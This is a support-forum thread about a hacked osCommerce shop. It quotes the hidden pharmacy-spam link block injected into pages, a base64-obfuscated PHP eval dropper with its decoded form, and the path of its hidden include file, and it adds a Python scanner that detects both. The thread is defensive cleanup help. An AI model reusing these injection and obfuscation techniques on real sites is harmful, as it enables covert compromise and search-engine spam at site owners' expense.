osCommerce


Hacked Site


dusty108


v2.2RC2

Google keywords has alerted me to the presence of the word "Cialis" on two of my web pages. When I checked the pages viewing the source this is what I found tagged on at the bottom of the page:

 

First Page: http://www.landnsea.co.uk/sailing-c-21.html

<br>

<script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>

<a href="http://www.premierinternet.com">generic cialis online</a>

<a href="http://www.jan-oidium.com">generic cialis</a>

<a href="http://www.cbn.co.za">generic viagra online</a>

<a href="http://www.cantors.org">cheap cialis</a>

<a href="http://www.technosci.com">cialis online</a>

<a href="http://www.lolitadress.net">generic cialis online</a>

<a href="http://www.mendocino-chocolate.com">cheap generic cialis</a>

<a href="http://www.apoprecords.com">cialis no prescription</a>

<a href="http://www.cardinalcorner.com">order cialis online</a>

<a href="http://vehicleemergencylighting.com">online pharmacy cialis</a>

<a href="http://www.tantrastoreonline.com">cialis price</a>

<a href="http://www.polhn.org">order cheap drugs online</a>

</p>

</body>

</html>

Second Page: http://www.landnsea.co.uk/penn-m-14.html

<!-- footer_eof //-->

<br>

<script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>

<a href="http://www.premierinternet.com">generic cialis online</a>

<a href="http://www.jan-oidium.com">generic cialis</a>

<a href="http://www.cbn.co.za">generic viagra online</a>

<a href="http://www.cantors.org">cheap cialis</a>

<a href="http://www.technosci.com">cialis online</a>

<a href="http://www.lolitadress.net">generic cialis online</a>

<a href="http://www.mendocino-chocolate.com">cheap generic cialis</a>

<a href="http://www.apoprecords.com">cialis no prescription</a>

<a href="http://www.cardinalcorner.com">order cialis online</a>

<a href="http://vehicleemergencylighting.com">online pharmacy cialis</a>

<a href="http://www.tantrastoreonline.com">cialis price</a>

<a href="http://www.polhn.org">order cheap drugs online</a>

</p>

</body>

</html>

 

How do I go about cleaning this up? Can I just go back to a safe back up date? File permissions are all set at 755/644.


You need to find out HOW the hack happened, then plug the hole. Reverting to a backup is no good.

 

You need to rename and password protect your Admin area NOW. I have messaged you something interesting.


 

Thanks Burt. That was rather surprising. Can you help with renaming admin? I tried changing the admin name, but when I log in I have problems going through the different menus as they keep looking for admin.


Log in FTP, rename the /admin/ folder to something completely random which would be hard to guess for anyone except you. Eg; /admin_qqq0wo38cnS/

 

Then download the file at

 

*your new admin name*/includes/configure.php

 

In that file, you'll find two or three instances of "admin" , change that to the same as your newly renamed admin area. Upload it.

 

Then use cPanel (or whatever host control panel you have) to password protect the admin using htaccess/htpasswd.


Oh and now find the security thread (it's a long one) and do all the security changes and sanitise your site of any existing bad code.

I have found the following code has been inserted in a random selection of files on my site: Do you think it could be the culprit?

 

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3Zob3N0cy9sYW5kbnNlYS5jby51ay9odHRwZG9jcy9sYW5kbnNlYS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>


Decodes to:

 

  if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
   $GLOBALS['mfsn'] = '/var/www/vhosts/YOUR_DOMAIN.co.uk/httpdocs/YOUR_DOMAIN/admin/includes/languages/english/modules/index/style.css.php';
   if(file_exists($GLOBALS['mfsn'])){
     include_once($GLOBALS['mfsn']);
     if(function_exists('gml')&&function_exists('dgobh')){
       ob_start('dgobh');
     }
   }
  }

It's hack code.

 

Also tells where to find one of their files.

 

/admin/includes/languages/english/modules/index/style.css.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

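The two injections quoted in this thread (the split-string `document.write` that hides a spam paragraph, and the `eval(base64_decode(...))` dropper that pulls in a second file) are both easy to find once you normalise them. The following scanner is an added example, not code from the thread or from osCommerce; the sample files it scans are constructed and use placeholder hosts and paths rather than the real ones from the posts.

```python
import base64
import re

# Constructed samples modelled on the two injections quoted in the thread
# (not the real files; hosts and paths are placeholders).
SAMPLE_FILES = {
    "sailing-c-21.html":
        '<!-- footer_eof //-->\n<br>\n'
        '<script>document.write("<p sty"+"le=displ"+"ay:no"+"ne>");</script>\n'
        '<a href="http://spam.example/">generic pills online</a>\n'
        '</p>\n</body>\n</html>\n',
    "includes/header.php":
        "<?php /**/eval(base64_decode('"
        + base64.b64encode(
            b"if(function_exists('ob_start')){include_once('/PLACEHOLDER_DOCROOT/admin/"
            b"includes/languages/english/modules/index/style.css.php');}").decode()
        + "')); ?>\n",
    "includes/clean.php": "<?php echo 'untouched'; ?>\n",
}

EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
JS_SPLIT = re.compile(r'"\s*\+\s*"')                 # "sty"+"le"  ->  "style"
HIDDEN_P = re.compile(r"<p\s+style=['\"]?\s*display\s*:\s*none", re.I)
PHP_PATH = re.compile(r"['\"](/[^'\"]+\.php)['\"]")   # file the dropper includes


def scan_text(text):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    for m in EVAL_B64.finditer(text):
        try:
            payload = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            payload = "<undecodable>"
        # Report the decoded payload and any .php file it tries to include:
        # that second file is the one the cleaner has to go and look for.
        findings.append(("eval-base64", payload))
        for path in PHP_PATH.findall(payload):
            findings.append(("include-target", path))
    # Undo the "a"+"b" string splitting before looking for the hidden block.
    if HIDDEN_P.search(JS_SPLIT.sub("", text)):
        findings.append(("hidden-paragraph", "display:none block written by script"))
    return findings


def scan_files(files):
    """Map file name -> findings, omitting files with nothing suspicious."""
    return {name: f for name, f in ((n, scan_text(t)) for n, t in files.items()) if f}
```

Run `scan_files` over the contents of every .php and .html file in the docroot; a file that reports an include-target tells you where the rest of the kit lives, which is exactly what the decoded payload above revealed.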

Thanks for decoding that for me. When I followed the path admin/includes/languages/english/modules/index/, the only files were customers.php and orders.php. No style.css.php. Strange?


I didn't make the soup, Doc, I can only tell you what's in it...

:blush:

 

The early versions of this hack showed their trash to anyone that viewed the page.

 

Now they have it programmed that it shows only when search engines index the site (keying off IP addresses).

 

You don't even know you're hacked unless you look at your cache in google or see the code in your files.

:'(


My host has scanned my site and removed the infection their scanners picked up. The problem no longer shows on the two files I quoted earlier. I'm going to have to sort out my admin file and see what else I can do to secure my site. Thanks for your help.


There is a thread in this area on "How to Secure Your Site".

 

Read that.

 

Part of it is removing the file_manager.php and define_language.php in your admin. I went to your site and the admin isn't protected by .htaccess.

 

That being said, they can get into the site via a vulnerability in the aforementioned files.

:o
